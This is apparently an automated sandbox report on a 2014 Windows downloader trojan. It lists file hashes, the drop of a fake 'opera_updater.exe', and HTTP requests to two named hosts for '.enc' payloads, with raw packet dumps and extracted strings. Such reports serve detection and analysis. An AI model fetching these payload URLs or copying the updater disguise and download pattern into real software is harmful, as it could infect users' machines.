Analysis Date: 2014-10-04 14:46:37
MD5: f6c72138357eee87cb007530665caba3
SHA1: cc896c6dfa73dab171557f5a0bd4f0f509e54234

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text — md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section .rdata — md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section .data — md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section .rsrc — md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section .reloc — md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp: 2014-02-05 03:55:00 (PE header compile timestamp; this field is attacker-controlled and should be treated as indicative only)
PEhash: 2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash: 7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe (dropped to %TEMP% under a browser-updater-like name, then executed; all network activity below originates from this child process)

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
(The Internet Settings registry reads, the index.dat files and the WinINet mutexes are consistent with the HTTP requests being issued through the WinINet stack; they are side effects of the download rather than indicators on their own.)
Winsock DNS: bsitacademy.com
Winsock DNS: wahidexpress.com

Network Details:

DNS: bsitacademy.com (Type: A) ➝ 107.150.48.43
DNS: wahidexpress.com (Type: A) ➝ 103.15.74.65
HTTP GET: http://bsitacademy.com/img/events/ie.enc — User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc — User-Agent: Updates downloader
HTTP GET: http://bsitacademy.com/img/events/ie.enc — User-Agent: Updates downloader
HTTP GET: http://wahidexpress.com/scripts/ie.enc — User-Agent: Updates downloader
(Each URL is requested twice, over a separate TCP connection each time. The non-browser User-Agent string "Updates downloader" and the "Cache-Control: no-cache" header are identical across all four requests — see Raw Pcap — and are the most specific network detection artifacts in this report. The ".enc" payloads were not captured here, so what is downloaded and whether it is executed cannot be established from this page.)
Flows TCP: 192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP: 192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP: 192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap (request side only of the four HTTP flows above; no server responses are included)
0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..


Strings (extracted from the sample: imported API names, the embedded manifest, and a large set of C:\<random>.exe and C:\<64-hex> paths — the origin of those paths is not established by this report, so confirm before using them as indicators)
l
\1.scr
C:\0ySzT4aT.exe
C:\0yXoJdS1.exe
C:\1f04c58cd64f1d992946720933171aa86f1f15c1c57d0d66f7a3dfd0d1cf617c
C:\1H6_lcAf.exe
C:\1lWYX1go.exe
C:\1x9OED5F.exe
C:\1XVNiGRb.exe
C:\2dbfd012c1b44dbc9f99256a2b84a81c857a7b9f7f28a0eec8d1c8438a2f77ed
C:\38116e45cf11c9def2c37fa30e06bc018e46cd9bf891a785b5ba6a5923323d5d
C:\3WL1_Gw5.exe
C:\487b40f83626767b4ac5984e18d98f99fb4a29a855746e349fe73a0c83ec2ca3
C:\4LBU19GE.exe
C:\4OAw6dNj.exe
C:\4vHknKs7.exe
C:\5hU_KKkp.exe
C:\7GI4gLFh.exe
C:\8iD2xfe3.exe
C:\94clNag9.exe
C:\9gcjgNaH.exe
C:\9Hvx4RXg.exe
C:\_9pyVfgZ.exe
C:\9R9GxndA.exe
C:\9Z3DNRt6.exe
C:\a34bkNIn.exe
C:\A94aUTod.exe
C:\_aAxeHJZ.exe
C:\aIUbH0QM.exe
C:\B40ygOE5.exe
C:\bKje2IhZ.exe
C:\ccKzXikR.exe
C:\CeBO5SWy.exe
C:\ChWZVCvj.exe
C:\cQdAWH3a.exe
C:\d053dbdc7fee7dfa8b7c01af8811d583b493feb3bd00dd2afa487c885907fab3
C:\d242d379e73a0b2762e096dc7771f85854a6272845ef675af6367f654920e6d1
C:\d7143680a75410278c9b95484bc00b271fcf34c23bd0de80aeec3cea7d6cedbc
C:\D7QkO4t7.exe
C:\do66h8_0.exe
C:\Documents and Settings\Administrator\
C:\dugEd0BI.exe
C:\euHCl5zZ.exe
C:\FmU16ViJ.exe
C:\GG7h0UdZ.exe
C:\H9wQLLOg.exe
C:\Hag4OLdF.exe
C:\hG3OL4IM.exe
C:\hrreFkRQ.exe
C:\hU6AF2Ic.exe
C:\_IpfgeoC.exe
C:\_Iunmiha.exe
C:\j2mY72oN.exe
C:\jESZdgrK.exe
C:\Jk2nLpP3.exe
C:\jpiHGeDv.exe
C:\jtEpPtXU.exe
C:\jUWj7TOq.exe
C:\kYD8fnKP.exe
C:\Leek6lUD.exe
C:\LiAKcAF0.exe
C:\LioP7mJk.exe
C:\LzmyGcKJ.exe
C:\M1U4wMJ9.exe
C:\mMu0FlJa.exe
C:\N6oieXD9.exe
C:\n7URlBKs.exe
C:\NLVEuUHH.exe
C:\NUcChWJX.exe
C:\nVwNaSav.exe
C:\octriONh.exe
C:\oRxOvwpF.exe
C:\oXlmXmEb.exe
C:\P1nd17rt.exe
C:\pFwvJXru.exe
C:\pjr4aBD_.exe
C:\PsX3MW6C.exe
C:\qFCCRxHi.exe
C:\qgX_3bi5.exe
C:\qYxqpebq.exe
C:\rrrNORCR.exe
C:\rzWK99mP.exe
C:\smfW_lRr.exe
C:\SqD0AIfE.exe
C:\tDiWugjj.exe
C:\_TmDm5Fe.exe
C:\TMtk4JD7.exe
C:\UowVcj_v.exe
C:\uxk8IO6h.exe
C:\v19V4M0P.exe
C:\Vh70EiAi.exe
C:\vP2nEv_R.exe
C:\w5V0zrq2.exe
C:\Wo_R3fMU.exe
C:\X4PhrCsC.exe
C:\x7OAl92o.exe
C:\X8mjs59k.exe
C:\xfqsWlNO.exe
C:\xPNihfHa.exe
C:\XPO1cNIb.exe
C:\YPkfVKVq.exe
C:\Ywr6ilYL.exe
C:\z3F0LSBP.exe
C:\zaoZlpum.exe
C:\zm1Dwebw.exe
C:\zOgUye0D.exe
C:\ztMjAXDD.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(